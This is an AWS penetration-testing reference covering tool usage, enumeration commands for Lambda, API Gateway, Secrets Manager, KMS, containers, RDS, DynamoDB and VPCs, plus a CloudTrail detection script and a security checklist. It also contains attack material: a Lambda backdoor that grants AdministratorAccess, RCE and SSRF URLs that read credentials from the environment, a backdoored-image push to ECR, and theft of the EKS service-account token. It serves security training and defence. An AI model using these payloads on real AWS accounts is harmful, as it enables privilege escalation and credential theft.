# Advanced AWS Penetration Testing Reference

## Table of Contents
- Training Resources
- Extended Tools Arsenal
- AWS API Calls That Return Credentials
- Lambda & API Gateway
- Secrets Manager & KMS
- Container Security (ECS/EKS/ECR)
- RDS Database Exploitation
- DynamoDB Exploitation
- VPC Enumeration & Lateral Movement
- Security Checklist

## Training Resources

| Resource | Description | URL |
|---|---|---|
| AWSGoat | Damn Vulnerable AWS Infrastructure | github.com/ine-labs/AWSGoat |
| Cloudgoat | AWS CTF-style scenario | github.com/RhinoSecurityLabs/cloudgoat |
| Flaws | AWS security challenge | flaws.cloud |
| SadCloud | Terraform for vuln AWS | github.com/nccgroup/sadcloud |
| DVCA | Vulnerable Cloud App | medium.com/poka-techblog |

## Extended Tools Arsenal

### weirdAAL - AWS Attack Library

```bash
python3 weirdAAL.py -m ec2_describe_instances -t demo
python3 weirdAAL.py -m lambda_get_account_settings -t demo
python3 weirdAAL.py -m lambda_get_function -a 'MY_LAMBDA_FUNCTION','us-west-2'
```

### cloudmapper - AWS Environment Analyzer

```bash
git clone https://github.com/duo-labs/cloudmapper.git
pipenv install --skip-lock
pipenv shell
# Subcommands, run as: python cloudmapper.py <command> --account ACCOUNT_NAME
report # Generate HTML report
iam_report # IAM-specific report
audit # Check misconfigurations
collect # Collect account metadata (required before the reports)
find_admins # Identify admin users/roles
```

### cloudsplaining - IAM Security Assessment

```bash
pip3 install --user cloudsplaining
cloudsplaining download --profile myawsprofile
cloudsplaining scan --input-file default.json
```

### s3_objects_check - S3 Object Permissions

```bash
git clone https://github.com/nccgroup/s3_objects_check
python s3-objects-check.py -p whitebox-profile -e blackbox-profile
```

### dufflebag - Find EBS Secrets

```bash
# Finds secrets exposed via Amazon EBS's "public" mode
git clone https://github.com/BishopFox/dufflebag
```
## AWS API Calls That Return Credentials

| API Call | Description |
|---|---|
| chime:createapikey | Create API key |
| codepipeline:pollforjobs | Poll for jobs |
| cognito-identity:getopenidtoken | Get OpenID token |
| cognito-identity:getcredentialsforidentity | Get identity credentials |
| connect:getfederationtoken | Get federation token |
| ecr:getauthorizationtoken | ECR auth token |
| gamelift:requestuploadcredentials | GameLift upload creds |
| iam:createaccesskey | Create access key |
| iam:createloginprofile | Create login profile |
| iam:createservicespecificcredential | Service-specific creds |
| lightsail:getinstanceaccessdetails | Instance access details |
| lightsail:getrelationaldatabasemasteruserpassword | DB master password |
| rds-db:connect | RDS connect |
| redshift:getclustercredentials | Redshift credentials |
| sso:getrolecredentials | SSO role credentials |
| sts:assumerole | Assume role |
| sts:assumerolewithsaml | Assume role with SAML |
| sts:assumerolewithwebidentity | Web identity assume |
| sts:getfederationtoken | Federation token |
| sts:getsessiontoken | Session token |
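A defender's use of the table above, as an added example that is not part of the original reference: it scans CloudTrail records for exactly these credential-returning operations and flags callers that hit several of them, which is the footprint a post-compromise credential sweep leaves in the trail. The sample records are constructed; the account id 123456789012 and the IP addresses are placeholders.

```python
# Actions from the table above in "service:action" form, lower-cased. CloudTrail logs the
# same operations as eventSource "<service>.amazonaws.com" plus eventName, so matching is
# done on that normalised key. rds-db:connect is enforced at database login rather than
# logged as an API event, so it is left out.
CREDENTIAL_RETURNING = {
    "chime:createapikey", "codepipeline:pollforjobs", "cognito-identity:getopenidtoken",
    "cognito-identity:getcredentialsforidentity", "connect:getfederationtoken",
    "ecr:getauthorizationtoken", "gamelift:requestuploadcredentials", "iam:createaccesskey",
    "iam:createloginprofile", "iam:createservicespecificcredential",
    "lightsail:getinstanceaccessdetails", "lightsail:getrelationaldatabasemasteruserpassword",
    "redshift:getclustercredentials", "sso:getrolecredentials", "sts:assumerole",
    "sts:assumerolewithsaml", "sts:assumerolewithwebidentity", "sts:getfederationtoken",
    "sts:getsessiontoken",
}

def event_action(record):
    """Map a CloudTrail record to the page's lower-case service:action form."""
    service = record["eventSource"].split(".", 1)[0]
    return f"{service}:{record['eventName']}".lower()

def find_credential_events(records):
    """(caller ARN, action, source IP, succeeded) for each credential-returning call."""
    hits = []
    for r in records:
        action = event_action(r)
        if action in CREDENTIAL_RETURNING:
            who = r.get("userIdentity", {}).get("arn", "unknown")
            hits.append((who, action, r.get("sourceIPAddress"), "errorCode" not in r))
    return hits

def harvesting_callers(records, threshold=3):
    """Callers that touched at least `threshold` distinct credential-returning APIs."""
    seen = {}
    for who, action, _ip, _ok in find_credential_events(records):
        seen.setdefault(who, set()).add(action)
    return {who: sorted(acts) for who, acts in seen.items() if len(acts) >= threshold}

# Constructed sample records in CloudTrail's JSON layout (not real log data).
def _rec(source, name, ip, user, **extra):
    return {"eventSource": source, "eventName": name, "sourceIPAddress": ip,
            "userIdentity": {"type": "IAMUser", "arn": f"arn:aws:iam::123456789012:user/{user}"}, **extra}
SAMPLE_TRAIL = [
    _rec("sts.amazonaws.com", "AssumeRole", "10.0.1.5", "ci"),
    _rec("iam.amazonaws.com", "CreateAccessKey", "198.51.100.7", "dev"),
    _rec("iam.amazonaws.com", "CreateLoginProfile", "198.51.100.7", "dev"),
    _rec("sts.amazonaws.com", "GetFederationToken", "198.51.100.7", "dev"),
    _rec("ec2.amazonaws.com", "DescribeInstances", "10.0.1.5", "ci"),  # not in the table
    _rec("iam.amazonaws.com", "CreateAccessKey", "198.51.100.7", "dev", errorCode="AccessDenied"),
]
```

Failed calls (records carrying `errorCode`) are kept in the output on purpose: a denied CreateAccessKey is often the first visible sign of a probing caller.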
## Lambda & API Gateway

### Lambda Enumeration

```bash
# List all lambda functions
aws lambda list-functions
# Get function details and download code
aws lambda get-function --function-name FUNCTION_NAME
wget -O lambda-function.zip "url-from-previous-query"
# Get function policy
aws lambda get-policy --function-name FUNCTION_NAME
# List event source mappings
aws lambda list-event-source-mappings --function-name FUNCTION_NAME
# List Lambda layers (dependencies)
aws lambda list-layers
aws lambda get-layer-version --layer-name NAME --version-number VERSION
```

### API Gateway Enumeration

```bash
# List REST APIs
aws apigateway get-rest-apis
# Get specific API info
aws apigateway get-rest-api --rest-api-id ID
# List endpoints (resources)
aws apigateway get-resources --rest-api-id ID
# Get method info
aws apigateway get-method --rest-api-id ID --resource-id RES_ID --http-method GET
# List API versions (stages)
aws apigateway get-stages --rest-api-id ID
# List API keys
aws apigateway get-api-keys --include-values
```

### Lambda Credential Access

```text
# Via RCE - get environment variables
https://apigateway/prod/system?cmd=env
# Via SSRF - access runtime API
https://apigateway/prod/example?url=http://localhost:9001/2018-06-01/runtime/invocation/
# Via file read
https://apigateway/prod/system?cmd=file:///proc/self/environ
```
### Lambda Backdooring

```python
# Malicious Lambda code to escalate privileges
import boto3
import json

def handler(event, context):
    iam = boto3.client("iam")
    iam.attach_role_policy(
        RoleName="role_name",
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    )
    iam.attach_user_policy(
        UserName="user_name",
        PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
    )
    return {'statusCode': 200, 'body': json.dumps("Pwned")}
```

```bash
# Update function with backdoor
aws lambda update-function-code --function-name NAME --zip-file fileb://backdoor.zip
# Invoke backdoored function
curl https://API_ID.execute-api.REGION.amazonaws.com/STAGE/ENDPOINT
```
## Secrets Manager & KMS

### Secrets Manager Enumeration

```bash
# List all secrets
aws secretsmanager list-secrets
# Describe specific secret
aws secretsmanager describe-secret --secret-id NAME
# Get resource policy
aws secretsmanager get-resource-policy --secret-id ID
# Retrieve secret value
aws secretsmanager get-secret-value --secret-id ID
```

### KMS Enumeration

```bash
# List KMS keys
aws kms list-keys
# Describe key
aws kms describe-key --key-id ID
# List key policies
aws kms list-key-policies --key-id ID
# Get full policy
aws kms get-key-policy --policy-name NAME --key-id ID
```
### KMS Decryption

```bash
# Decrypt file (key info embedded in ciphertext); the Plaintext field is base64-encoded
aws kms decrypt --ciphertext-blob fileb://EncryptedFile --output text --query Plaintext | base64 --decode
```
## Container Security (ECS/EKS/ECR)

### ECR Enumeration

```bash
# List repositories
aws ecr describe-repositories
# Get repository policy
aws ecr get-repository-policy --repository-name NAME
# List images
aws ecr list-images --repository-name NAME
# Describe image
aws ecr describe-images --repository-name NAME --image-ids imageTag=TAG
```

### ECS Enumeration

```bash
# List clusters
aws ecs list-clusters
# Describe cluster
aws ecs describe-clusters --cluster NAME
# List services
aws ecs list-services --cluster NAME
# Describe service
aws ecs describe-services --cluster NAME --services SERVICE
# List tasks
aws ecs list-tasks --cluster NAME
# Describe task (shows network info for pivoting)
aws ecs describe-tasks --cluster NAME --tasks TASK_ARN
# List container instances
aws ecs list-container-instances --cluster NAME
```

### EKS Enumeration

```bash
# List EKS clusters
aws eks list-clusters
# Describe cluster
aws eks describe-cluster --name NAME
# List node groups
aws eks list-nodegroups --cluster-name NAME
# Describe node group
aws eks describe-nodegroup --cluster-name NAME --nodegroup-name NODE_NAME
# List Fargate profiles
aws eks list-fargate-profiles --cluster-name NAME
```
### Container Backdooring

```bash
# Authenticate Docker to ECR
aws ecr get-login-password --region REGION | docker login --username AWS --password-stdin ECR_ADDR
# Build backdoored image
docker build -t image_name .
# Tag for ECR (ECR image references are REGISTRY/REPOSITORY:TAG)
docker tag image_name ECR_ADDR/REPO_NAME:TAG
# Push to ECR
docker push ECR_ADDR/REPO_NAME:TAG
```

### EKS Secrets via RCE

```text
# List Kubernetes secrets
https://website.com/rce.php?cmd=ls /var/run/secrets/kubernetes.io/serviceaccount
# Get service account token
https://website.com/rce.php?cmd=cat /var/run/secrets/kubernetes.io/serviceaccount/token
```
## RDS Database Exploitation

### RDS Enumeration

```bash
# List RDS clusters
aws rds describe-db-clusters
# List RDS instances
aws rds describe-db-instances
# Check: IAMDatabaseAuthenticationEnabled: false = password auth
# List subnet groups
aws rds describe-db-subnet-groups
# List security groups
aws rds describe-db-security-groups
# List proxies
aws rds describe-db-proxies
```

### Password-Based Access

```bash
mysql -h HOSTNAME -u USERNAME -P PORT -p
```

### IAM-Based Access

```bash
# Generate auth token (signed locally, valid for 15 minutes)
TOKEN=$(aws rds generate-db-auth-token \
  --hostname HOSTNAME \
  --port PORT \
  --username USERNAME \
  --region REGION)
# Connect with token; IAM auth requires TLS, so add --ssl-ca=<RDS CA bundle>
# if your client does not negotiate it by default
mysql -h HOSTNAME -u USERNAME -P PORT \
  --enable-cleartext-plugin --password=$TOKEN
```

## DynamoDB Exploitation

```bash
# List tables
aws dynamodb list-tables
# Scan table contents
aws dynamodb scan --table-name TABLE_NAME | jq -r '.Items[]'
# Query specific items
aws dynamodb query --table-name TABLE_NAME \
  --key-condition-expression "pk = :pk" \
  --expression-attribute-values '{":pk":{"S":"user"}}'
```
## VPC Enumeration & Lateral Movement

### VPC Enumeration

```bash
# List VPCs
aws ec2 describe-vpcs
# List subnets
aws ec2 describe-subnets --filters "Name=vpc-id,Values=VPC_ID"
# List route tables
aws ec2 describe-route-tables --filters "Name=vpc-id,Values=VPC_ID"
# List Network ACLs
aws ec2 describe-network-acls
# List VPC peering connections
aws ec2 describe-vpc-peering-connections
```

### Route Table Targets

| Destination | Target | Description |
|---|---|---|
| IP | local | VPC internal |
| IP | igw | Internet Gateway |
| IP | nat | NAT Gateway |
| IP | pcx | VPC Peering |
| IP | vpce | VPC Endpoint |
| IP | vgw | VPN Gateway |
| IP | eni | Network Interface |

### Lateral Movement via VPC Peering

```bash
# List peering connections
aws ec2 describe-vpc-peering-connections
# List instances in target VPC
aws ec2 describe-instances --filters "Name=vpc-id,Values=VPC_ID"
# List instances in specific subnet
aws ec2 describe-instances --filters "Name=subnet-id,Values=SUBNET_ID"
```
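The route-target prefixes in the table above and the peering pivot, worked through in an added example (not from the original reference): it classifies each route in `aws ec2 describe-route-tables` output by the prefix convention in the table and reports which subnets have a default route through an Internet Gateway and which can reach a peered VPC, the two facts a reviewer wants from this enumeration step. The sample output and every id in it are constructed.

```python
# Target id prefixes from the route-table table above, mapped to what the route reaches.
TARGET_KINDS = {"local": "VPC internal", "igw": "Internet Gateway", "nat": "NAT Gateway",
                "pcx": "VPC Peering", "vpce": "VPC Endpoint", "vgw": "VPN Gateway",
                "eni": "Network Interface"}
# describe-route-tables puts the target in a different key depending on its type.
TARGET_KEYS = ("GatewayId", "NatGatewayId", "VpcPeeringConnectionId",
               "NetworkInterfaceId", "TransitGatewayId", "InstanceId")

def route_target(route):
    for key in TARGET_KEYS:
        if route.get(key):
            return route[key]
    return None

def classify_target(target):
    """'local' is literal; every other target id starts with a type prefix (igw-, pcx-, ...)."""
    if target == "local":
        return TARGET_KINDS["local"]
    return TARGET_KINDS.get(target.split("-", 1)[0], "other")

def summarize_route_tables(describe_output):
    """Return (rows, internet_exposed_subnets, peered_subnets) from describe-route-tables output."""
    rows, exposed, peered = [], set(), set()
    for table in describe_output["RouteTables"]:
        # A table with no subnet association is the VPC's main table.
        subnets = [a["SubnetId"] for a in table.get("Associations", []) if a.get("SubnetId")] or ["main"]
        for route in table.get("Routes", []):
            if route.get("State", "active") != "active":   # skip blackhole routes
                continue
            dest = route.get("DestinationCidrBlock") or route.get("DestinationIpv6CidrBlock")
            target = route_target(route)
            kind = classify_target(target) if target else "unknown"
            for subnet in subnets:
                rows.append((subnet, dest, target, kind))
                if dest in ("0.0.0.0/0", "::/0") and kind == "Internet Gateway":
                    exposed.add(subnet)
                if kind == "VPC Peering":
                    peered.add(subnet)
    return rows, sorted(exposed), sorted(peered)

# Constructed sample in the shape of `aws ec2 describe-route-tables` output (not real data).
SAMPLE_ROUTE_TABLES = {"RouteTables": [
    {"RouteTableId": "rtb-0a", "Associations": [{"SubnetId": "subnet-pub1"}], "Routes": [
        {"DestinationCidrBlock": "10.0.0.0/16", "GatewayId": "local", "State": "active"},
        {"DestinationCidrBlock": "0.0.0.0/0", "GatewayId": "igw-0a1", "State": "active"}]},
    {"RouteTableId": "rtb-0b", "Associations": [{"SubnetId": "subnet-priv1"}], "Routes": [
        {"DestinationCidrBlock": "10.0.0.0/16", "GatewayId": "local", "State": "active"},
        {"DestinationCidrBlock": "0.0.0.0/0", "NatGatewayId": "nat-0b2", "State": "active"},
        {"DestinationCidrBlock": "10.1.0.0/16", "VpcPeeringConnectionId": "pcx-0c3", "State": "active"},
        {"DestinationCidrBlock": "10.2.0.0/16", "VpcPeeringConnectionId": "pcx-0d4", "State": "blackhole"}]},
]}
```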
## Security Checklist

### Identity and Access Management
- Avoid use of root account
- MFA enabled for all IAM users with console access
- Disable credentials unused for 90+ days
- Rotate access keys every 90 days
- Password policy: uppercase, lowercase, symbol, number, 14+ chars
- No root access keys exist
- MFA enabled for root account
- IAM policies attached to groups/roles only
### Logging
- CloudTrail enabled in all regions
- CloudTrail log file validation enabled
- CloudTrail S3 bucket not publicly accessible
- CloudTrail integrated with CloudWatch Logs
- AWS Config enabled in all regions
- CloudTrail logs encrypted with KMS
- KMS key rotation enabled
### Networking
- No security groups allow 0.0.0.0/0 to port 22
- No security groups allow 0.0.0.0/0 to port 3389
- VPC flow logging enabled
- Default security group restricts all traffic
### Monitoring
- Alarm for unauthorized API calls
- Alarm for console sign-in without MFA
- Alarm for root account usage
- Alarm for IAM policy changes
- Alarm for CloudTrail config changes
- Alarm for console auth failures
- Alarm for CMK disabling/deletion
- Alarm for S3 bucket policy changes
- Alarm for security group changes
- Alarm for NACL changes
- Alarm for VPC changes